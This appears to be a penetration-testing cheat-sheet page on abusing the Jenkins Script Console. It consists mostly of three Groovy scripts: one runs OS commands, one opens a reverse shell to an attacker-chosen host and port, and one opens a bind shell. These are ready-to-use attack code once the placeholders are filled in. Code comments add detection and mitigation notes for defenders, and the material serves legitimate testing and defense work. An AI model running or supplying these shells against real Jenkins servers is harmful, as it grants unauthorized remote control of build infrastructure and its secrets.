-
https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6
-
"Manage Jenkins" > "Script Console" > Run.
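Execute command (the Script Console requires the Overall/Administer permission; the script runs unsandboxed inside the Jenkins controller JVM, with the OS privileges of that process):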
{% code title="exec.groovy" %}
// Runs one OS command from the Jenkins Script Console and prints what it wrote.
// The script executes inside the Jenkins controller JVM, so the child process
// inherits the OS account of that JVM.
// Buffers that receive the child's stdout and stderr.
def sout = new StringBuffer(), serr = new StringBuffer()
// Groovy's String.execute() launches the string as a process.
def proc = 'whoami'.execute()
// Drain both streams into the buffers so the child cannot stall on a full pipe.
proc.consumeProcessOutput(sout, serr)
// Wait at most 1000 ms; the child is killed if it is still running after that.
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
// Detection: the command appears in host process-creation telemetry as a child
// of the Jenkins java process. Mitigation: keep Overall/Administer (and with it
// Script Console access) limited to a small, audited set of accounts.
{% endcode %}
Reverse shell:
{% code title="reverse.groovy" %}
// Starts a command interpreter on the Jenkins controller and relays its I/O over
// an outbound TCP connection to host:port.
// <LHOST> and <LPORT> are template placeholders; the script does not parse until
// they are substituted.
// Defender view: the observable artefacts are (1) a shell spawned as a child of
// the Jenkins java process and (2) an outbound TCP connection from the controller
// to a host that is not part of normal build traffic. Egress filtering on the
// controller and tight control of Overall/Administer are the relevant mitigations.
String host = "<LHOST>";
int port = <LPORT>;
String cmd = "/bin/bash"; // or "cmd.exe" for Windows
// redirectErrorStream(true) merges the child's stderr into its stdout.
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
// Outbound connection from the controller.
Socket s = new Socket(host, port);
// pi/pe: child's stdout/stderr, si: data arriving on the socket.
// Because stderr is merged above, pe is not expected to yield any data.
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
// po: child's stdin, so: data sent on the socket.
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// Polling relay: copy whatever is available in each direction, one byte at a time.
while (!s.isClosed()) {
while (pi.available() > 0)
so.write(pi.read());
while (pe.available() > 0)
so.write(pe.read());
while (si.available() > 0)
po.write(si.read());
so.flush();
po.flush();
// 50 ms pause between polling rounds.
Thread.sleep(50);
// exitValue() throws while the child is still running; the empty catch swallows
// that, so the break is reached only once the child has exited.
try {
p.exitValue();
break;
} catch (Exception e) {}
};
// Cleanup: terminate the child and close the socket.
p.destroy();
s.close();
{% endcode %}
Bind shell:
{% code title="bind.groovy" %}
// Starts a command interpreter on the Jenkins controller, listens on a TCP port,
// and relays the interpreter's I/O to the first client that connects.
// <LPORT> is a template placeholder; the script does not parse until it is
// substituted.
// Defender view: the observable artefacts are (1) a shell spawned as a child of
// the Jenkins java process and (2) a new listening TCP port owned by that java
// process. Inbound filtering / host firewalling of the controller and tight
// control of Overall/Administer are the relevant mitigations.
int port = <LPORT>;
String cmd="/bin/bash"; // or "cmd.exe" for Windows
// redirectErrorStream(true) merges the child's stderr into its stdout.
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
// accept() blocks until one client connects. The ServerSocket itself is not kept
// in a variable, so the script never closes it explicitly.
// NOTE(review): the listening port may therefore outlive the session; confirm on the host.
Socket s = new java.net.ServerSocket(port).accept();
// pi/pe: child's stdout/stderr, si: data arriving on the socket.
// Because stderr is merged above, pe is not expected to yield any data.
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
// po: child's stdin, so: data sent on the socket.
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// Polling relay: copy whatever is available in each direction, one byte at a time.
while (!s.isClosed()) {
while (pi.available() > 0)
so.write(pi.read());
while (pe.available() > 0)
so.write(pe.read());
while (si.available() > 0)
po.write(si.read());
so.flush();
po.flush();
// 50 ms pause between polling rounds.
Thread.sleep(50);
// exitValue() throws while the child is still running; the empty catch swallows
// that, so the break is reached only once the child has exited.
try {
p.exitValue();
break;
} catch (Exception e) {}
};
// Cleanup: terminate the child and close the accepted socket.
p.destroy();
s.close();
{% endcode %}